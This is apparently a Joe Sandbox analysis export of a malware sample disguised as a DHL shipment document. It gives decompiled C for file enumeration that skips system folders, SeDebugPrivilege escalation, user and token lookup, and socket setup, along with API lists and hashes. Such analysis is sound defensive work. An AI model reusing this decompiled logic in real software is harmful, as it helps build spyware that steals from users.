calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap HeapFree 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 
9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 
8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 

Control-flow Graph (rendered graph not included in this extract)
                    C-Code - Quality: 85%
                    			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				struct _WIN32_FIND_DATAW _v596;
                    				void* __ebx;
                    				void* _t35;
                    				int _t43;
                    				void* _t52;
                    				int _t56;
                    				intOrPtr _t60;
                    				void* _t66;
                    				void* _t73;
                    				void* _t74;
                    				WCHAR* _t98;
                    				void* _t99;
                    				void* _t100;
                    				void* _t101;
                    				WCHAR* _t102;
                    				void* _t103;
                    				void* _t104;
                    
                    				L004067C4(0xa); // executed
                    				_t72 = 0;
                    				_t100 = 0x2e;
                    				_t106 = _a16;
                    				if(_a16 == 0) {
                    					L15:
                    					_push(_a8);
                    					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                    					_t104 = _t103 + 0xc;
                    					if(_t98 == 0) {
                    						L30:
                    						__eflags = 0;
                    						return 0;
                    					}
                    					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                    					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                    					_t73 = _t35;
                    					if(_t73 == 0xffffffff) {
                    						L29:
                    						E00402BAB(_t98);
                    						goto L30;
                    					}
                    					L17:
                    					while(1) {
                    						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                    							if(_v596.dwFileAttributes != 0x10) {
                    								L21:
                    								_push( &(_v596.cFileName));
                    								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                    								_t104 = _t104 + 0xc;
                    								if(_t101 == 0) {
                    									goto L24;
                    								}
                    								if(_a12 == 0) {
                    									E00402BAB(_t98);
                    									E00403BEF(_t73);
                    									return _t101;
                    								}
                    								_a12(_t101);
                    								E00402BAB(_t101);
                    								goto L24;
                    							}
                    							_t124 = _a20;
                    							if(_a20 == 0) {
                    								goto L24;
                    							}
                    							goto L21;
                    						} else {
                    							L24:
                    							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                    							_t43 = FindNextFileW(_t73,  &_v596); // executed
                    							if(_t43 == 0) {
                    								E00403BEF(_t73); // executed
                    								goto L29;
                    							}
                    							_t100 = 0x2e;
                    							continue;
                    						}
                    					}
                    				}
                    				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                    				if(_t102 == 0) {
                    					L14:
                    					_t100 = 0x2e;
                    					goto L15;
                    				}
                    				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                    				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                    				_t74 = _t52;
                    				if(_t74 == 0xffffffff) {
                    					L13:
                    					E00402BAB(_t102);
                    					_t72 = 0;
                    					goto L14;
                    				} else {
                    					goto L3;
                    				}
                    				do {
                    					L3:
                    					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                    						goto L11;
                    					}
                    					if(_a24 == 0) {
                    						L7:
                    						if(E00405D24( &(_v596.cFileName)) >= 3) {
                    							L9:
                    							_push( &(_v596.cFileName));
                    							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                    							_t103 = _t103 + 0xc;
                    							_a16 = _t60;
                    							_t115 = _t60;
                    							if(_t60 == 0) {
                    								goto L11;
                    							}
                    							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                    							E00402BAB(_a16);
                    							_t103 = _t103 + 0x1c;
                    							if(_t99 != 0) {
                    								E00402BAB(_t102);
                    								E00403BEF(_t74);
                    								return _t99;
                    							}
                    							goto L11;
                    						}
                    						_t66 = 0x2e;
                    						_t114 = _v596.cFileName - _t66;
                    						if(_v596.cFileName == _t66) {
                    							goto L11;
                    						}
                    						goto L9;
                    					}
                    					_push(L"Windows");
                    					if(E00405EFF( &(_v596.cFileName)) != 0) {
                    						goto L11;
                    					}
                    					_push(L"Program Files");
                    					if(E00405EFF( &(_v596.cFileName)) != 0) {
                    						goto L11;
                    					}
                    					goto L7;
                    					L11:
                    					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                    					_t56 = FindNextFileW(_t74,  &_v596); // executed
                    				} while (_t56 != 0);
                    				E00403BEF(_t74); // executed
                    				goto L13;
                    			}

                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                    				void* _v8;
                    				struct _LUID _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				struct _TOKEN_PRIVILEGES _v32;
                    				intOrPtr* _t13;
                    				void* _t14;
                    				int _t16;
                    				int _t31;
                    				void* _t32;
                    
                    				_t31 = 0;
                    				E004060AC();
                    				_t32 = __eax;
                    				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                    				_t14 =  *_t13(_t32, 0x28,  &_v8);
                    				if(_t14 != 0) {
                    					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                    					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                    					if(_t16 != 0) {
                    						_push(__ebx);
                    						_v32.Privileges = _v16.LowPart;
                    						_v32.PrivilegeCount = 1;
                    						_v24 = _v16.HighPart;
                    						_v20 = 2;
                    						E004031E5(1, 9, 0xc1642df2, 0, 0);
                    						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                    						_t31 =  !=  ? 1 : 0;
                    					}
                    					E00403C40(_v8);
                    					return _t31;
                    				}
                    				return _t14;
                    			}

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402B7C(long _a4) {
                    				void* _t4;
                    				void* _t7;
                    
                    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                    				_t7 = _t4;
                    				if(_t7 != 0) {
                    					E00402B4E(_t7, 0, _a4);
                    				}
                    				return _t7;
                    			}

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406069(WCHAR* _a4, DWORD* _a8) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                    				_t4 = GetUserNameW(_a4, _a8); // executed
                    				return _t4;
                    			}

                    APIs
                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                    Uniqueness

                    Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not included in this extract)
                    C-Code - Quality: 75%
                    			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                    				int _v8;
                    				long _v12;
                    				int _v16;
                    				int _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				intOrPtr* _t25;
                    				int _t27;
                    				int _t30;
                    				int _t31;
                    				int _t36;
                    				int _t37;
                    				intOrPtr* _t39;
                    				int _t40;
                    				long _t44;
                    				intOrPtr* _t45;
                    				int _t46;
                    				void* _t48;
                    				int _t49;
                    				void* _t67;
                    				void* _t68;
                    				void* _t74;
                    
                    				_t48 = __ebx;
                    				_t67 = 0;
                    				_v8 = 0;
                    				E00402BF2();
                    				_t68 = __eax;
                    				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                    				_t2 =  &_v8; // 0x414449
                    				_push(1);
                    				_push(8);
                    				_push(_t68);
                    				if( *_t25() != 0) {
                    					L4:
                    					_t27 = E00402B7C(0x208);
                    					_v20 = _t27;
                    					__eflags = _t27;
                    					if(_t27 != 0) {
                    						E0040338C(_t27, _t67, 0x104);
                    						_t74 = _t74 + 0xc;
                    					}
                    					_push(_t48);
                    					_t49 = E00402B7C(0x208);
                    					__eflags = _t49;
                    					if(_t49 != 0) {
                    						E0040338C(_t49, _t67, 0x104);
                    						_t74 = _t74 + 0xc;
                    					}
                    					_v28 = 0x208;
                    					_v24 = 0x208;
                    					_t7 =  &_v8; // 0x414449
                    					_v12 = _t67;
                    					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                    					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                    					__eflags = _t30;
                    					if(_t30 == 0) {
                    						_t36 = E00402B7C(_v12);
                    						_v16 = _t36;
                    						__eflags = _t36;
                    						if(_t36 != 0) {
                    							_t14 =  &_v8; // 0x414449, executed
                    							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                    							__eflags = _t37;
                    							if(_t37 != 0) {
                    								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                    								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                    								__eflags = _t40;
                    								if(__eflags != 0) {
                    									_t67 = E00405B6F(__eflags, L"%s", _t49);
                    								}
                    							}
                    							E00402BAB(_v16);
                    						}
                    					}
                    					__eflags = _v8;
                    					if(_v8 != 0) {
                    						E00403C40(_v8); // executed
                    					}
                    					__eflags = _t49;
                    					if(_t49 != 0) {
                    						E00402BAB(_t49);
                    					}
                    					_t31 = _v20;
                    					__eflags = _t31;
                    					if(_t31 != 0) {
                    						E00402BAB(_t31);
                    					}
                    					return _t67;
                    				}
                    				_t44 = GetLastError();
                    				if(_t44 == 0x3f0) {
                    					E004060AC();
                    					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                    					_t3 =  &_v8; // 0x414449
                    					_t46 =  *_t45(_t44, 8, _t3);
                    					__eflags = _t46;
                    					if(_t46 == 0) {
                    						goto L2;
                    					}
                    					goto L4;
                    				}
                    				L2:
                    				return 0;
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 37%
                    			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void _v40;
                    				void* _t23;
                    				signed int _t24;
                    				signed int* _t25;
                    				signed int _t30;
                    				signed int _t31;
                    				signed int _t33;
                    				signed int _t41;
                    				void* _t42;
                    				signed int* _t43;
                    
                    				_v8 = _v8 & 0x00000000;
                    				_t33 = 8;
                    				memset( &_v40, 0, _t33 << 2);
                    				_v32 = 1;
                    				_t23 =  &_v40;
                    				_v28 = 6;
                    				_v36 = 2;
                    				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                    				if(_t23 == 0) {
                    					_t24 = E00402B7C(4);
                    					_t43 = _t24;
                    					_t31 = _t30 | 0xffffffff;
                    					 *_t43 = _t31;
                    					_t41 = _v8;
                    					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                    					 *_t43 = _t24;
                    					if(_t24 != _t31) {
                    						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                    						if(_t24 == _t31) {
                    							E00404DE5(_t24,  *_t43);
                    							 *_t43 = _t31;
                    						}
                    						__imp__freeaddrinfo(_v8);
                    						if( *_t43 != _t31) {
                    							_t25 = _t43;
                    							goto L10;
                    						} else {
                    							E00402BAB(_t43);
                    							L8:
                    							_t25 = 0;
                    							L10:
                    							return _t25;
                    						}
                    					}
                    					E00402BAB(_t43);
                    					__imp__freeaddrinfo(_v8);
                    					goto L8;
                    				}
                    				return 0;
                    			}

                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                    				struct _SECURITY_ATTRIBUTES* _v8;
                    				char _v12;
                    				long _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t16;
                    				intOrPtr* _t25;
                    				long* _t28;
                    				void* _t30;
                    				int _t32;
                    				intOrPtr* _t33;
                    				void* _t35;
                    				void* _t42;
                    				intOrPtr _t43;
                    				long _t44;
                    				struct _OVERLAPPED* _t46;
                    
                    				_t46 = 0;
                    				_t35 = 0;
                    				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                    				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                    				_t42 = _t16;
                    				_v8 = _t42;
                    				if(_t42 == 0xffffffff) {
                    					__eflags = _a12;
                    					if(_a12 == 0) {
                    						L10:
                    						return _t35;
                    					}
                    					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                    					__eflags = _t43;
                    					if(_t43 == 0) {
                    						goto L10;
                    					}
                    					_push(0);
                    					__eflags = E00403C59(_a4, _t43);
                    					if(__eflags != 0) {
                    						_v8 = 0;
                    						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                    						_push(_t43);
                    						 *_a8 = _v8;
                    						E00403D44();
                    					}
                    					E00402BAB(_t43);
                    					return _t46;
                    				}
                    				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                    				_t44 =  *_t25(_t42,  &_v12);
                    				if(_v12 != 0 || _t44 > 0x40000000) {
                    					L8:
                    					_t45 = _v8;
                    					goto L9;
                    				} else {
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 = _t44;
                    					}
                    					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                    					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                    					_t35 = _t30;
                    					if(_t35 == 0) {
                    						goto L8;
                    					} else {
                    						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                    						_t45 = _v8;
                    						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                    						if(_t32 == 0) {
                    							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                    							 *_t33(_t35, _t46, 0x8000);
                    							_t35 = _t46;
                    						}
                    						L9:
                    						E00403C40(_t45); // executed
                    						goto L10;
                    					}
                    				}
                    			}

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    Uniqueness

                    Uniqueness Score: -1.00%

